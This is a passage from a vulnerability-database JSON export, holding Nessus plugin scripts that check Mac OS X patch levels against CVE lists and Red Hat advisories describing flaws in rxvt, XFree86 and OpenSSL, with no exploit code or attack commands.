'softwareupdate', as it is the last supported version\nof the system.\n\";\n }\n if (defined_func(\"report_xml_tag\"))\n {\n report_xml_tag(tag:\"operating-system-unsupported\", value:\"true\");\n report_xml_tag(tag:\"UnsupportedProduct:apple:mac_os_x:\"+version, value:\"true\");\n }\n security_hole(port:0, extra:report);\n }\n\n if ( ereg(pattern:\"Mac OS X 10\\.2\\.\", string:os ))\n {\n report = \"\nThe remote host is running Mac OS X 10.2. This version is not supported\nby Apple any more, you should upgrade the remote host to the latest version\nof Mac OS X.\n\";\n if ( ereg(pattern:\"Mac OS X 10\\.2\\.[0-7]\", string:os ))\n {\n report += \"\nIn addition to this, the remote host should at least be upgraded to\nMacOS 10.2.8 using 'softwareupdate', as it is the last supported version\nof the system.\n\";\n }\n\n if (defined_func(\"report_xml_tag\"))\n {\n report_xml_tag(tag:\"operating-system-unsupported\", value:\"true\");\n report_xml_tag(tag:\"UnsupportedProduct:apple:mac_os_x:\"+version, value:\"true\"); \n }\n security_hole(port:0, extra:report);\n }\n\n if ( ereg(pattern:\"Mac OS X 10\\.([3-9]|2\\.8)\", string:os ) )\n {\n set_kb_item(name:\"CVE-2003-0542\", value:TRUE);\n set_kb_item(name:\"CVE-2003-0543\", value:TRUE);\n set_kb_item(name:\"CVE-2003-0544\", value:TRUE);\n set_kb_item(name:\"CVE-2003-0545\", value:TRUE);\n }\n\n\n\n\n\n if ( ereg(pattern:\"Mac OS X 10\\.3\\.[0-8]\", string:os ))\n {\n report = \"\nThe remote host is running a version of Mac OS X 10.3 which is older\nthan version 10.3.9.\n\nApple's newest security updates require Mac OS X 10.3.9 to be applied\nproperly. The remote host should be upgraded to this version as soon\nas possible.\n\";\n\n if (defined_func(\"report_xml_tag\"))\n {\n report_xml_tag(tag:\"operating-system-unsupported\", value:\"true\");\n report_xml_tag(tag:\"UnsupportedProduct:apple:mac_os_x:\"+version, value:\"true\"); \n }\n security_hole(port:0, extra:report);\n }\n\n if ( ereg(pattern:\"Mac OS X 10\\.(3\\.[3-9]|[4-9])\", string:os ))\n {\n set_kb_item(name:\"CVE-2004-0174\", value:TRUE);\n set_kb_item(name:\"CVE-2003-0020\", value:TRUE);\n }\n\n\n if ( ereg(pattern:\"Mac OS X 10\\.(3\\.[4-9]|[4-9])\", string:os))\n {\n set_kb_item(name:\"CVE-2004-0174\", value:TRUE);\n set_kb_item(name:\"CVE-2003-0020\", value:TRUE);\n set_kb_item(name:\"CVE-2004-0079\", value:TRUE);\n set_kb_item(name:\"CVE-2004-0081\", value:TRUE);\n set_kb_item(name:\"CVE-2004-0112\", value:TRUE);\n }\n\n if ( ereg(pattern:\"Mac OS X 10\\.(3\\.[5-9]|[4-9])\", string:os))\n {\n set_kb_item(name:\"CVE-2002-1363\", value:TRUE);\n set_kb_item(name:\"CVE-2004-0421\", value:TRUE);\n set_kb_item(name:\"CVE-2004-0597\", value:TRUE);\n set_kb_item(name:\"CVE-2004-0598\", value:TRUE);\n set_kb_item(name:\"CVE-2004-0599\", value:TRUE);\n set_kb_item(name:\"CVE-2004-0743\", value:TRUE);\n set_kb_item(name:\"CVE-2004-0744\", value:TRUE);\n }\n if ( ereg(pattern:\"Mac OS X 10\\.(3\\.[7-9]|[4-9])\", string:os))\n {\n set_kb_item(name:\"CVE-2004-1082\", value:TRUE);\n set_kb_item(name:\"CVE-2003-0020\", value:TRUE);\n set_kb_item(name:\"CVE-2003-0987\", value:TRUE);\n set_kb_item(name:\"CVE-2004-0174\", value:TRUE);\n set_kb_item(name:\"CVE-2004-0488\", value:TRUE);\n set_kb_item(name:\"CVE-2004-0492\", value:TRUE);\n set_kb_item(name:\"CVE-2004-0885\", value:TRUE);\n set_kb_item(name:\"CVE-2004-0940\", value:TRUE);\n set_kb_item(name:\"CVE-2004-1083\", value:TRUE);\n set_kb_item(name:\"CVE-2004-1084\", value:TRUE);\n set_kb_item(name:\"CVE-2004-0747\", value:TRUE);\n set_kb_item(name:\"CVE-2004-0786\", value:TRUE);\n set_kb_item(name:\"CVE-2004-0751\", value:TRUE);\n set_kb_item(name:\"CVE-2004-0748\", value:TRUE);\n set_kb_item(name:\"CVE-2004-1081\", value:TRUE);\n set_kb_item(name:\"CVE-2004-0803\", value:TRUE);\n set_kb_item(name:\"CVE-2004-0804\", value:TRUE);\n set_kb_item(name:\"CVE-2004-0886\", value:TRUE);\n set_kb_item(name:\"CVE-2004-1089\", value:TRUE);\n set_kb_item(name:\"CVE-2004-1085\", value:TRUE);\n set_kb_item(name:\"CVE-2004-0642\", value:TRUE);\n set_kb_item(name:\"CVE-2004-0643\", value:TRUE);\n set_kb_item(name:\"CVE-2004-0644\", value:TRUE);\n set_kb_item(name:\"CVE-2004-0772\", value:TRUE);\n set_kb_item(name:\"CVE-2004-1088\", value:TRUE);\n set_kb_item(name:\"CVE-2004-1086\", value:TRUE);\n set_kb_item(name:\"CVE-2004-1123\", value:TRUE);\n set_kb_item(name:\"CVE-2004-1121\", value:TRUE);\n set_kb_item(name:\"CVE-2004-1122\", value:TRUE);\n set_kb_item(name:\"CVE-2004-1087\", value:TRUE);\n }\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-11-29T14:42:46", "description": "The remote host is running a version of Mac OS X 10.5 that does not have Security Update 2010-002 applied.\n\nThis security update contains fixes for the following products :\n\n - AppKit\n - Application Firewall\n - AFP Server\n - Apache\n - ClamAV\n - CoreTypes\n - CUPS\n - curl\n - Cyrus IMAP\n - Cyrus SASL\n - Disk Images\n - Directory Services\n - Event Monitor\n - FreeRADIUS\n - FTP Server\n - iChat Server\n - Image RAW\n - Libsystem\n - Mail\n - Mailman\n - OS Services\n - Password Server\n - perl\n - PHP\n - PS Normalizer\n - Ruby\n - Server Admin\n - SMB\n - Tomcat\n - unzip\n - vim\n - Wiki Server\n - X11\n - xar", "cvss3": {}, "published": "2010-03-29T00:00:00", "type": "nessus", "title": "Mac OS X Multiple Vulnerabilities (Security Update 2010-002)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2003-0063", "CVE-2006-1329", "CVE-2008-0564", "CVE-2008-0888", "CVE-2008-2712", "CVE-2008-4101", "CVE-2008-5302", "CVE-2008-5303", "CVE-2008-5515", "CVE-2009-0033", "CVE-2009-0037", "CVE-2009-0316", "CVE-2009-0580", "CVE-2009-0688", "CVE-2009-0689", "CVE-2009-0781", "CVE-2009-0783", "CVE-2009-1904", "CVE-2009-2042", "CVE-2009-2417", "CVE-2009-2422", "CVE-2009-2632", "CVE-2009-2693", "CVE-2009-2801", "CVE-2009-2901", "CVE-2009-2902", "CVE-2009-2906", "CVE-2009-3009", "CVE-2009-3095", "CVE-2009-3557", "CVE-2009-3558", "CVE-2009-3559", "CVE-2009-4142", "CVE-2009-4143", "CVE-2009-4214", "CVE-2010-0041", "CVE-2010-0042", "CVE-2010-0055", "CVE-2010-0056", "CVE-2010-0057", "CVE-2010-0058", "CVE-2010-0063", "CVE-2010-0065", "CVE-2010-0393", "CVE-2010-0497", "CVE-2010-0498", "CVE-2010-0500", "CVE-2010-0501", "CVE-2010-0502", "CVE-2010-0503", "CVE-2010-0504", "CVE-2010-0505", "CVE-2010-0506", "CVE-2010-0507", "CVE-2010-0508", "CVE-2010-0509", "CVE-2010-0510", "CVE-2010-0513", "CVE-2010-0521", "CVE-2010-0522", "CVE-2010-0523", "CVE-2010-0524", "CVE-2010-0525", "CVE-2010-0533"], "modified": "2018-07-16T00:00:00", "cpe": ["cpe:/o:apple:mac_os_x"], "id": "MACOSX_SECUPD2010-002.NASL", "href": "https://www.tenable.com/plugins/nessus/45373", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\nif (!defined_func(\"bn_random\")) exit(0);\nif (NASL_LEVEL < 3000) exit(0);\n\n\ninclude(\"compat.inc\");\n\n\nif (description)\n{\n script_id(45373);\n script_version(\"1.29\");\n script_cvs_date(\"Date: 2018/07/16 12:48:31\");\n\n script_cve_id(\n \"CVE-2003-0063\",\n \"CVE-2006-1329\",\n \"CVE-2008-0564\",\n \"CVE-2008-0888\",\n \"CVE-2008-2712\",\n \"CVE-2008-4101\",\n \"CVE-2008-5302\",\n \"CVE-2008-5303\",\n \"CVE-2008-5515\",\n \"CVE-2009-0033\",\n \"CVE-2009-0037\",\n \"CVE-2009-0316\",\n \"CVE-2009-0580\",\n \"CVE-2009-0688\",\n \"CVE-2009-0689\",\n \"CVE-2009-0781\",\n \"CVE-2009-0783\",\n \"CVE-2009-1904\",\n \"CVE-2009-2042\",\n \"CVE-2009-2417\",\n \"CVE-2009-2422\",\n \"CVE-2009-2632\",\n \"CVE-2009-2693\",\n \"CVE-2009-2801\",\n \"CVE-2009-2901\",\n \"CVE-2009-2902\",\n \"CVE-2009-2906\",\n \"CVE-2009-3009\",\n \"CVE-2009-3095\",\n \"CVE-2009-3557\",\n \"CVE-2009-3558\",\n \"CVE-2009-3559\",\n \"CVE-2009-4142\",\n \"CVE-2009-4143\",\n \"CVE-2009-4214\",\n \"CVE-2010-0041\",\n \"CVE-2010-0042\",\n \"CVE-2010-0055\",\n \"CVE-2010-0056\",\n \"CVE-2010-0057\",\n \"CVE-2010-0058\",\n \"CVE-2010-0063\",\n \"CVE-2010-0065\",\n \"CVE-2010-0393\",\n \"CVE-2010-0497\",\n \"CVE-2010-0498\",\n \"CVE-2010-0500\",\n \"CVE-2010-0501\",\n \"CVE-2010-0502\",\n \"CVE-2010-0503\",\n \"CVE-2010-0504\",\n \"CVE-2010-0505\",\n \"CVE-2010-0506\",\n \"CVE-2010-0507\",\n \"CVE-2010-0508\",\n \"CVE-2010-0509\",\n \"CVE-2010-0510\",\n \"CVE-2010-0513\",\n \"CVE-2010-0521\",\n \"CVE-2010-0522\",\n \"CVE-2010-0523\",\n \"CVE-2010-0524\",\n \"CVE-2010-0525\",\n \"CVE-2010-0533\"\n );\n script_bugtraq_id(\n 6940,\n 12767,\n 17155,\n 27630,\n 28288,\n 29715,\n 30795,\n 33447,\n 33962,\n 34961,\n 35193,\n 35196,\n 35233,\n 35263,\n 35278,\n 35416,\n 35510,\n 35579,\n 36032,\n 36278,\n 36296,\n 36377,\n 36554,\n 36555,\n 36573,\n 37142,\n 37389,\n 37390,\n 37942,\n 37944,\n 37945,\n 38524,\n 38676,\n 38677,\n 39151,\n 39156,\n 39157,\n 39169,\n 39170,\n 39171,\n 39172,\n 39175,\n 39194,\n 39231,\n 39232,\n 39234,\n 39245,\n 39252,\n 39255,\n 39256,\n 39264,\n 39268,\n 39273,\n 39274,\n 39277,\n 39279,\n 39281,\n 39289,\n 39290,\n 39292\n );\n\n script_name(english:\"Mac OS X Multiple Vulnerabilities (Security Update 2010-002)\");\n script_summary(english:\"Check for the presence of Security Update 2010-002\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote host is missing a Mac OS X update that fixes various\nsecurity issues.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is running a version of Mac OS X 10.5 that does not\nhave Security Update 2010-002 applied.\n\nThis security update contains fixes for the following products :\n\n - AppKit\n - Application Firewall\n - AFP Server\n - Apache\n - ClamAV\n - CoreTypes\n - CUPS\n - curl\n - Cyrus IMAP\n - Cyrus SASL\n - Disk Images\n - Directory Services\n - Event Monitor\n - FreeRADIUS\n - FTP Server\n - iChat Server\n - Image RAW\n - Libsystem\n - Mail\n - Mailman\n - OS Services\n - Password Server\n - perl\n - PHP\n - PS Normalizer\n - Ruby\n - Server Admin\n - SMB\n - Tomcat\n - unzip\n - vim\n - Wiki Server\n - X11\n - xar\"\n );\n script_set_attribute(\n attribute:\"see_also\", \n value:\"http://support.apple.com/kb/HT4077\"\n );\n script_set_attribute(\n attribute:\"see_also\", \n value:\"http://lists.apple.com/archives/security-announce/2010/Mar/msg00001.html\"\n );\n script_set_attribute(\n attribute:\"see_also\", \n value:\"http://www.securityfocus.com/advisories/19364\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Install Security Update 2010-002 or later.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'D2ExploitPack');\n script_cwe_id(20, 22, 79, 119, 189, 200, 264, 287, 310, 352, 362);\nscript_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/03/29\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/03/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/03/29\");\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:apple:mac_os_x\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n script_copyright(english:\"This script is Copyright (C) 2010-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/MacOSX/packages\", \"Host/uname\");\n\n exit(0);\n}\n\n\nuname = get_kb_item(\"Host/uname\");\nif (!uname) exit(1, \"The 'Host/uname' KB item is missing.\");\n\npat = \"^.+Darwin.* ([0-9]+\\.[0-9.]+).*$\";\nif (!ereg(pattern:pat, string:uname)) exit(1, \"Can't identify the Darwin kernel version from the uname output (\"+uname+\").\");\n\n\ndarwin = ereg_replace(pattern:pat, replace:\"\\1\", string:uname);\nif (ereg(pattern:\"^9\\.[0-8]\\.\", string:darwin))\n{\n packages = get_kb_item(\"Host/MacOSX/packages/boms\");\n if (!packages) exit(1, \"The 'Host/MacOSX/packages/boms' KB item is missing.\");\n\n if (egrep(pattern:\"^com\\.apple\\.pkg\\.update\\.security\\.(2010\\.00[2-9]|201[1-9]\\.[0-9]+)(\\.leopard)?\\.bom\", string:packages)) \n exit(0, \"The host has Security Update 2010-002 or later installed and therefore is not affected.\");\n else \n security_hole(0);\n}\nelse exit(0, \"The host is running Darwin kernel version \"+darwin+\" and therefore is not affected.\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-11-29T14:42:18", "description": "The remote host is running a version of Mac OS X 10.6.x that is prior to 10.6.3.\n\nMac OS X 10.6.3 contains security fixes for the following products :\n\n - AFP Server\n - Apache\n - CoreAudio\n - CoreMedia\n - CoreTypes\n - CUPS\n - DesktopServices\n - Disk Images\n - Directory Services\n - Dovecot\n - Event Monitor\n - FreeRADIUS\n - FTP Server\n - iChat Server\n - ImageIO\n - Image RAW\n - Libsystem\n - Mail\n - MySQL\n - OS Services\n - Password Server\n - PHP\n - Podcast Producer\n - Preferences\n - PS Normalizer\n - QuickTime\n - Ruby\n - Server Admin\n - SMB\n - Tomcat\n - Wiki Server\n - X11", "cvss3": {}, "published": "2010-03-29T00:00:00", "type": "nessus", "title": "Mac OS X 10.6.x < 10.6.3 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2003-0063", "CVE-2006-1329", "CVE-2008-4456", "CVE-2008-5515", "CVE-2008-7247", "CVE-2009-0033", "CVE-2009-0580", "CVE-2009-0689", "CVE-2009-0781", "CVE-2009-0783", "CVE-2009-1904", "CVE-2009-2042", "CVE-2009-2417", "CVE-2009-2422", "CVE-2009-2446", "CVE-2009-2693", "CVE-2009-2901", "CVE-2009-2902", "CVE-2009-2906", "CVE-2009-3009", "CVE-2009-3095", "CVE-2009-3557", "CVE-2009-3558", "CVE-2009-3559", "CVE-2009-4017", "CVE-2009-4019", "CVE-2009-4030", "CVE-2009-4214", "CVE-2010-0041", "CVE-2010-0042", "CVE-2010-0043", "CVE-2010-0057", "CVE-2010-0059", "CVE-2010-0060", "CVE-2010-0062", "CVE-2010-0063", "CVE-2010-0064", "CVE-2010-0065", "CVE-2010-0393", "CVE-2010-0497", "CVE-2010-0498", "CVE-2010-0500", "CVE-2010-0501", "CVE-2010-0502", "CVE-2010-0504", "CVE-2010-0505", "CVE-2010-0507", "CVE-2010-0508", "CVE-2010-0509", "CVE-2010-0510", "CVE-2010-0511", "CVE-2010-0512", "CVE-2010-0513", "CVE-2010-0514", "CVE-2010-0515", "CVE-2010-0516", "CVE-2010-0517", "CVE-2010-0518", "CVE-2010-0519", "CVE-2010-0520", "CVE-2010-0521", "CVE-2010-0524", "CVE-2010-0525", "CVE-2010-0526", "CVE-2010-0533", "CVE-2010-0534", "CVE-2010-0535", "CVE-2010-0537"], "modified": "2018-07-16T00:00:00", "cpe": ["cpe:/o:apple:mac_os_x"], "id": "MACOSX_10_6_3.NASL", "href": "https://www.tenable.com/plugins/nessus/45372", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\nif (!defined_func(\"bn_random\")) exit(0);\nif (NASL_LEVEL < 3000) exit(0);\n\n\ninclude(\"compat.inc\");\n\n\nif (description)\n{\n script_id(45372);\n script_version(\"1.31\");\n script_cvs_date(\"Date: 2018/07/16 12:48:31\");\n\n script_cve_id(\n \"CVE-2003-0063\",\n \"CVE-2006-1329\",\n \"CVE-2008-4456\",\n \"CVE-2008-5515\",\n \"CVE-2008-7247\",\n \"CVE-2009-0033\",\n \"CVE-2009-0580\",\n \"CVE-2009-0689\",\n \"CVE-2009-0781\",\n \"CVE-2009-0783\",\n \"CVE-2009-1904\",\n \"CVE-2009-2042\",\n \"CVE-2009-2417\",\n \"CVE-2009-2422\",\n \"CVE-2009-2446\",\n \"CVE-2009-2693\",\n \"CVE-2009-2901\",\n \"CVE-2009-2902\",\n \"CVE-2009-2906\",\n \"CVE-2009-3009\",\n \"CVE-2009-3095\",\n \"CVE-2009-3557\",\n \"CVE-2009-3558\",\n \"CVE-2009-3559\",\n \"CVE-2009-4017\",\n \"CVE-2009-4019\",\n \"CVE-2009-4030\",\n \"CVE-2009-4214\",\n \"CVE-2010-0041\",\n \"CVE-2010-0042\",\n \"CVE-2010-0043\",\n \"CVE-2010-0057\",\n \"CVE-2010-0059\",\n \"CVE-2010-0060\",\n \"CVE-2010-0062\",\n \"CVE-2010-0063\",\n \"CVE-2010-0064\",\n \"CVE-2010-0065\",\n \"CVE-2010-0393\",\n \"CVE-2010-0497\",\n \"CVE-2010-0498\",\n \"CVE-2010-0500\",\n \"CVE-2010-0501\",\n \"CVE-2010-0502\",\n \"CVE-2010-0504\",\n \"CVE-2010-0505\",\n \"CVE-2010-0507\",\n \"CVE-2010-0508\",\n \"CVE-2010-0509\",\n \"CVE-2010-0510\",\n \"CVE-2010-0511\",\n \"CVE-2010-0512\",\n \"CVE-2010-0513\",\n \"CVE-2010-0514\",\n \"CVE-2010-0515\",\n \"CVE-2010-0516\",\n \"CVE-2010-0517\",\n \"CVE-2010-0518\",\n \"CVE-2010-0519\",\n \"CVE-2010-0520\",\n \"CVE-2010-0521\",\n \"CVE-2010-0524\",\n \"CVE-2010-0525\",\n \"CVE-2010-0526\",\n \"CVE-2010-0533\",\n \"CVE-2010-0534\",\n \"CVE-2010-0535\",\n \"CVE-2010-0537\"\n );\n script_bugtraq_id(\n 6940,\n 17155,\n 31486,\n 35193,\n 35196,\n 35233,\n 35263,\n 35278,\n 35416,\n 35510,\n 35579,\n 35609,\n 36032,\n 36278,\n 36554,\n 36555,\n 36573,\n 37075,\n 37142,\n 37297,\n 37942,\n 37944,\n 37945,\n 38043,\n 38524,\n 38673,\n 38676,\n 38677,\n 39151,\n 39153,\n 39157,\n 39160,\n 39161,\n 39171,\n 39172,\n 39175,\n 39194,\n 39230,\n 39231,\n 39232,\n 39234,\n 39236,\n 39252,\n 39255,\n 39256,\n 39258,\n 39264,\n 39268,\n 39273,\n 39274,\n 39278,\n 39279,\n 39281,\n 39291\n );\n\n script_name(english:\"Mac OS X 10.6.x < 10.6.3 Multiple Vulnerabilities\");\n script_summary(english:\"Check the version of Mac OS X\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote host is missing a Mac OS X update that fixes various\nsecurity issues.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is running a version of Mac OS X 10.6.x that is prior\nto 10.6.3.\n\nMac OS X 10.6.3 contains security fixes for the following products :\n\n - AFP Server\n - Apache\n - CoreAudio\n - CoreMedia\n - CoreTypes\n - CUPS\n - DesktopServices\n - Disk Images\n - Directory Services\n - Dovecot\n - Event Monitor\n - FreeRADIUS\n - FTP Server\n - iChat Server\n - ImageIO\n - Image RAW\n - Libsystem\n - Mail\n - MySQL\n - OS Services\n - Password Server\n - PHP\n - Podcast Producer\n - Preferences\n - PS Normalizer\n - QuickTime\n - Ruby\n - Server Admin\n - SMB\n - Tomcat\n - Wiki Server\n - X11\"\n );\n script_set_attribute(\n attribute:\"see_also\", \n value:\"http://support.apple.com/kb/HT4077\"\n );\n script_set_attribute(\n attribute:\"see_also\", \n value:\"http://lists.apple.com/archives/security-announce/2010/Mar/msg00001.html\"\n );\n script_set_attribute(\n attribute:\"see_also\", \n value:\"http://www.securityfocus.com/advisories/19364\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Upgrade to Mac OS X 10.6.3 or later.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'D2ExploitPack');\n script_cwe_id(20, 22, 59, 79, 119, 134, 189, 200, 264, 287, 310);\nscript_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/03/29\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/03/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/03/29\");\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:apple:mac_os_x\");\n script_end_attributes();\n \n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n \n script_copyright(english:\"This script is Copyright (C) 2010-2018 Tenable Network Security, Inc.\");\n \n script_dependencies(\"ssh_get_info.nasl\", \"os_fingerprint.nasl\");\n\n exit(0);\n}\n\n\nos = get_kb_item(\"Host/MacOSX/Version\");\nif (!os)\n{\n os = get_kb_item(\"Host/OS\");\n c = get_kb_item(\"Host/OS/Confidence\");\n if ( isnull(os) || c <= 70 ) exit(0);\n}\nif (!os) exit(1, \"The 'Host/OS' KB item is missing.\");\n\n\nif (ereg(pattern:\"Mac OS X 10\\.6($|\\.[0-2]([^0-9]|$))\", string:os)) security_hole(0);\nelse exit(0, \"The host is not affected as it is running \"+os+\".\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}], "redhat": [{"lastseen": "2021-10-21T04:44:45", "description": "Rxvt is a color VT102 terminal emulator for the X Window System. A number\nof issues have been found in the escape sequence handling of Rxvt.\nThese could be potentially exploited if an attacker can cause carefully\ncrafted escape sequences to be displayed on an rxvt terminal being used by\ntheir victim. \n\nOne of the features which most terminal emulators support is the ability\nfor the shell to set the title of the window using an escape sequence. \nCertain xterm variants, including rxvt, also provide an escape sequence for\nreporting the current window title. This essentially takes the current\ntitle and places it directly on the command line. Since it is not\npossible to embed a carriage return into the window title itself, the\nattacker would have to convince the victim to press the Enter key for the\ntitle to be processed as a command, although the attacker can perform a\nnumber of actions to increase the likelihood of this happening.\n\nA certain escape sequence when displayed in rxvt will create an arbitrary\nfile. \n\nIt is possible to add malicious items to the dynamic menus through an\nescape sequence.\n\nUsers of Rxvt are advised to upgrade to these errata packages which contain\na patch to disable the title reporting functionality and patches to correct\nthe other issues.\n\nRed Hat would like to thank H D Moore for bringing these issues to our\nattention.", "cvss3": {}, "published": "2003-02-06T00:00:00", "type": "redhat", "title": "(RHSA-2003:055) rxvt security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2003-0022", "CVE-2003-0023", "CVE-2003-0066"], "modified": "2018-03-14T15:26:25", "id": "RHSA-2003:055", "href": "https://access.redhat.com/errata/RHSA-2003:055", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-10-21T04:46:08", "description": "XFree86 is an implementation of the X Window System, which provides the\ngraphical user interface, video drivers, etc. for Linux systems.\n\nA number of security vulnerabilities have been found and fixed. In\naddition, various other bug fixes, driver updates, and other enhancements\nhave been made.\n\nSecurity fixes:\n\nXterm, provided as part of the XFree86 packages, provides an escape\nsequence for reporting the current window title. This escape sequence\nessentially takes the current title and places it directly on the command\nline. An attacker can craft an escape sequence that sets the victim's Xterm\nwindow title to an arbitrary command, and then reports it to the command\nline. Since it is not possible to embed a carriage return into the window\ntitle, the attacker would then have to convince the victim to press Enter\nfor the shell to process the title as a command, although the attacker\ncould craft other escape sequences that might convince the victim to do so.\nThe Common Vulnerabilities and Exposures project (cve.mitre.org) has\nassigned the name CAN-2003-0063 to this issue.\n\nIt is possible to lock up versions of Xterm by sending an invalid DEC\nUDK escape sequence. The Common Vulnerabilities and Exposures project\n(cve.mitre.org) has assigned the name CAN-2003-0071 to this issue.\n\nThe xdm display manager, with the authComplain variable set to false,\nallows arbitrary attackers to connect to the X server if the xdm auth\ndirectory does not exist. The Common Vulnerabilities and Exposures project\n(cve.mitre.org) has assigned the name CAN-2002-1510 to this issue.\n\nThese erratum packages also contain an updated fix for CAN-2002-0164, a\nvulnerability in the MIT-SHM extension of the X server that allows local\nusers to read and write arbitrary shared memory. The original fix did not\ncover the case where the X server is started from xdm.\n\nThe X server was setting the /dev/dri directory permissions incorrectly,\nwhich resulted in the directory being world writable. It now sets the\ndirectory permissions to a safe value. The Common Vulnerabilities and\nExposures project (cve.mitre.org) has assigned the name CAN-2001-1409 to\nthis issue.\n\nDriver updates and other fixes:\n\nThe Rage 128 video driver (r128) has been updated to provide 2D support\nfor all previously unsupported ATI Rage 128 hardware. DRI 3D support\nshould also work on the majority of Rage 128 hardware.\n\nBad page size assumptions in the ATI Radeon video driver (radeon) have\nbeen fixed, allowing the driver to work properly on ia64 and other\narchitectures where the page size is not fixed.\n\nA long-standing XFree86 bug has been fixed. This bug occurs when any form\nof system clock skew (such as NTP clock synchronization, APM suspend/resume\ncycling on laptops, daylight savings time changeover, or even manually\nsetting the system clock forward or backward) could result in odd\napplication behavior, mouse and keyboard lockups, or even an X server hang\nor crash.\n\nThe S3 Savage driver (savage) has been updated to the upstream author's\nlatest version \"1.1.27t\", which should fix numerous bugs reported by\nvarious users, as well as adding support for some newer savage hardware.\n\nUsers are advised to upgrade to these updated packages, which contain\nXFree86 version 4.1.0 with patches correcting these issues.", "cvss3": {}, "published": "2003-06-25T00:00:00", "type": "redhat", "title": "(RHSA-2003:065) XFree86 security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2001-1409", "CVE-2002-0164", "CVE-2002-1510", "CVE-2003-0063", "CVE-2003-0071"], "modified": "2018-03-14T15:27:47", "id": "RHSA-2003:065", "href": "https://access.redhat.com/errata/RHSA-2003:065", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-10-21T04:44:34", "description": "OpenSSL is a commercial-grade, full-featured, open source toolkit which\nimplements the Secure Sockets Layer (SSL v2/v3) and Transport Layer\nSecurity (TLS v1) protocols as well as a full-strength, general purpose\ncryptography library.\n\nIn a paper, Brice Canvel, Alain Hiltgen, Serge Vaudenay, and Martin\nVuagnoux describe and demonstrate a timing-based attack on CBC ciphersuites\nin SSL and TLS. An active attacker may be able to use timing observations\nto distinguish between two different error cases: cipher padding errors and\nMAC verification errors. Over multiple connections this can leak\nsufficient information to be able to retrieve the plaintext of a common,\nfixed block.\n\nIn order for an attack to be sucessful an attacker must be able to act as a\nman-in-the-middle to intercept and modify multiple connections which all\ninvolve a common fixed plaintext block (such as a password), and have good\nnetwork conditions that allow small changes in timing to be reliably observed.\n\nThese updated packages contain a patch provided by the OpenSSL group that\ncorrects this vulnerability.\n\nBecause server applications are affected by these vulnerabilities, we\nadvise users to restart all services that use OpenSSL functionality or\nalternatively reboot their systems after installing these updates.", "cvss3": {}, "published": "2003-02-19T00:00:00", "type": "redhat", "title": 